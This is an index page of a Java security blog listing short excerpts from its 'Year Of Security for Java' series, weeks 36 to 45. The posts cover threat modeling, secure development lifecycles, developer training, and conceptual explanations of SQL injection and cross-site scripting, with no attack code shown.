Skip to content

John Melton's Weblog

Java, Security and Technology

  • About

Author: john

Year Of Security for Java – Week 45 – Do Threat Modeling

Tweet What is it and why should I care? After the last post covering secure the concept of a secure SDLC, this week we’ll look at a specific activity recommended by the various secure SDLC models: threat modeling. From the view of the secure SDLC, this is an activity that takes place fairly early in […]

Read More…

2012/11/09 john3 Comments

Year Of Security for Java – Week 44 – Follow a Secure SDLC

Tweet What is it and why should I care? Software development has taken an interesting path over the short lifetime of the field. It began as a deeply technical field where only the best and brightest could participate, which is not unusual since it was born out of engineering, a very technical and structured field […]

Read More…

2012/11/03 john1 Comment

Year Of Security for Java – Week 43 – Build Something (and Give It Away)

Tweet What is it and why should I care? This will admittedly be a short post because it’s a pretty simple concept. Here’s the simple idea in bullet form: – Developers are builders of software (and security systems and even documentation sometimes) – There is a need for software & docs – Developers build software […]

Read More…

2012/10/27 johnNo Comments

Year Of Security for Java – Week 42 – Break Something

Tweet What is it and why should I care? Breaking something (legally, of course) is one of the best ways to learn how it works. Software is no different. Breaking software is sometimes trivial and sometimes extremely complex, but either way is a great exercise. In particular for developers, it forces you out of the […]

Read More…

2012/10/19 john1 Comment

Year Of Security for Java – Week 41 – Spend (Wisely) on Developer Security Training

Tweet What is it and why should I care? In the last post, I gave some justifications for getting security people into your organization, as well as reasons to have them closely knitted into your team. In this post, I’d like to move the attention to the developers already on your team. Let’s say you’ve […]

Read More…

2012/10/12 johnNo Comments

Year Of Security for Java – Week 40 – Get a Security Person (or Some People) if You Can

Tweet What is it and why should I care? I spend a good bit of time talking about both development and security. I spend a lot of time working with other developers and other security people. There are a precious few that I know of that excel at both development and security. This is a […]

Read More…

2012/10/05 john1 Comment

Year Of Security for Java – Week 39 – Don’t Reinvent the Wheel (Unless It’s Square)

Tweet What is it and why should I care? This is a bit of a follow-up to my last post with a bit of a different viewpoint. In that post, I specifically looked at code reuse from the perspective of creating an internal framework to centralize code related to security functionality. This week, I want […]

Read More…

2012/09/27 johnNo Comments

Year Of Security for Java – Week 38 – Create A Reusable Security Framework

Tweet What is it and why should I care? Software reuse is a ubiquitous practice in software development. One study says that “80% of the code in today’s applications comes from libraries and frameworks”. That’s a lot. There is already a lot of research about software reuse and its benefits. While the research exists, there’s […]

Read More…

2012/09/21 john1 Comment

Year Of Security for Java – Week 37 – Solve Cross-Site Scripting

Tweet What is it and why should I care? Cross-Site Scripting (XSS) is another issue that is caused because of poor code/data separation. The general issue is that a developer intends the user input to be interpreted as data, but an attacker can manipulate the input to cause the browser to interpret the input as […]

Read More…

2012/09/12 johnNo Comments

Year Of Security for Java – Week 36 – Solve SQL Injection

Tweet What is it and why should I care? SQL Injection (SQLi) is an issue that is caused because of poor code/data separation. The general issue is that a developer intends the user input to be interpreted as data, but an attacker can manipulate the input to cause the database to interpret the input as […]

Read More…

2012/09/07 john1 Comment

Posts navigation

Older posts
Newer posts

Decode Theme by Macho Themes

Archives

  • December 2014
  • January 2013
  • December 2012
  • November 2012
  • October 2012
  • September 2012
  • August 2012
  • July 2012
  • June 2012
  • May 2012
  • April 2012
  • March 2012
  • February 2012
  • January 2012
  • February 2011
  • November 2010
  • September 2010
  • August 2010
  • July 2010
  • June 2010
  • May 2010
  • December 2009
  • January 2009
  • January 2008
  • November 2007
  • October 2007
  • August 2007
  • July 2007